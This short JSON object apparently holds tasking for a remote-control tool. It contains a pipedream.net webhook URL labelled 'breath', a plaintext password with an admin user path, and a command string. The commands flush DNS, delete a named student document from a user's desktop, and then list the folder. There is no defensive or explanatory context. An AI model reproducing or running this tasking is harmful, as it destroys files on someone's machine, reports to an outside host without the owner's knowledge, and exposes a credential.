{"breath":"https://eog70e0zwzqc91s.m.pipedream.net","24w413b":{"PassWord":"SifeCleak123456","path":"C:\\Users\\admin\\"},"command":" ipconfig /flushdns\ndel D:\\RjDir\\admin_b2130ad1-3ecd-4455-b1c4-9780d43c9b10\\Desktop\\未处理学生.docx\ndir D:\\RjDir\\admin_b2130ad1-3ecd-4455-b1c4-9780d43c9b10\\Desktop"}
